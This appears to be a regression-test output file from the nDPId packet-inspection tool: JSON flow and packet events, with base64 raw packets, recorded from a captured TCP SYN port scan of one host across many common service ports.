+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"synscan.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056403,"flow_last_seen":1278275056403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056403,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"synscan.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1278275056403,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056403,"pkt":"ACYLMQczACWzv5HuCABFAAAsT54AADAGyNSsEAAIQA2GNIzSAIvdUoMYAAAAAGACBAA0BAAAAgQFtA=="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1278275056464,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275056464,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACABQjNJ7XAKI3VKDGWASFtCjyQAAAgQFZAAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"synscan.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056466,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"synscan.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1278275056466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056466,"pkt":"ACYLMQczACWzv5HuCABFAAAsoqsAAC4Gd8esEAAIQA2GNIzSDT3dUoMYAAAAAGACDAAfUgAAAgQFtA=="} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"synscan.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056466,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"synscan.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1278275056466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056466,"pkt":"ACYLMQczACWzv5HuCABFAAAs400AADkGLCWsEAAIQA2GNIzSABfdUoMYAAAAAGACCAAweAAAAgQFtA=="} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"synscan.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057477,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"synscan.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057477,"pkt":"ACYLMQczACWzv5HuCABFAAAs0LAAACUGUsKsEAAIQA2GNIzTABfdU4MZAAAAAGACCAAwdQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"synscan.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057477,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"synscan.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057477,"pkt":"ACYLMQczACWzv5HuCABFAAAsjfEAACkGkYGsEAAIQA2GNIzTDT3dU4MZAAAAAGACCAAjTwAAAgQFtA=="} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"synscan.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057477,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"synscan.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057477,"pkt":"ACYLMQczACWzv5HuCABFAAAs40UAADcGLi2sEAAIQA2GNIzTAIvdU4MZAAAAAGACEAAoAQAAAgQFtA=="} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"synscan.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057477,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"synscan.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057477,"pkt":"ACYLMQczACWzv5HuCABFAAAsNE8AACgG7COsEAAIQA2GNIzTABXdU4MZAAAAAGACBAA0dwAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"synscan.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"synscan.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAskg4AAC4GiGSsEAAIQA2GNIzTFwzdU4MZAAAAAGACDAAVgAAAAgQFtA=="} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAsh\/MAAC8GkX+sEAAIQA2GNIzTAkvdU4MZAAAAAGACEAAmQQAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"synscan.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"synscan.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAscq0AACUGsMWsEAAIQA2GNIzTA+PdU4MZAAAAAGACCAAsqQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"synscan.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"synscan.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAsocYAACoGfKysEAAIQA2GNIzTBAHdU4MZAAAAAGACDAAoiwAAAgQFtA=="} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"synscan.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"synscan.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAs0nYAADMGQvysEAAIQA2GNIzTAG\/dU4MZAAAAAGACEAAoHQAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"synscan.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"synscan.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAs0EcAADoGPiusEAAIQA2GNIzTAMfdU4MZAAAAAGACDAArxQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"synscan.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"synscan.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAs+2cAACwGIQusEAAIQA2GNIzTDOrdU4MZAAAAAGACBAAnogAAAgQFtA=="} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"synscan.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"synscan.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAsTRAAAC8GzGKsEAAIQA2GNIzTAI\/dU4MZAAAAAGACEAAn\/QAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"synscan.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"synscan.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAsDXoAAC0GDfmsEAAIQA2GNIzTAbvdU4MZAAAAAGACCAAu0QAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"synscan.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"synscan.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsaUIAACsGtDCsEAAIQA2GNIzSBrvdUoMYAAAAAGACEAAh1AAAAgQFtA=="} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"synscan.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"synscan.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsvHwAADMGWPasEAAIQA2GNIzSA+HdUoMYAAAAAGACEAAkrgAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"synscan.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"synscan.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsMtIAACsG6qCsEAAIQA2GNIzSAG7dUoMYAAAAAGACEAAoIQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"synscan.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"synscan.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsXl8AAC8GuxOsEAAIQA2GNIzSH5DdUoMYAAAAAGACEAAI\/wAAAgQFtA=="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"synscan.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"synscan.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsGxAAACsGAmOsEAAIQA2GNIzSBrjdUoMYAAAAAGACEAAh1wAAAgQFtA=="} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAsWWoAACoGxQisEAAIQA2GNIzSABndUoMYAAAAAGACDAAsdgAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"synscan.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"synscan.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAs03wAADEGQ\/asEAAIQA2GNIzSAb3dUoMYAAAAAGACCAAu0gAAAgQFtA=="} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"synscan.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"synscan.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAsszkAADEGZDmsEAAIQA2GNIzSAQDdUoMYAAAAAGACCAAvjwAAAgQFtA=="} 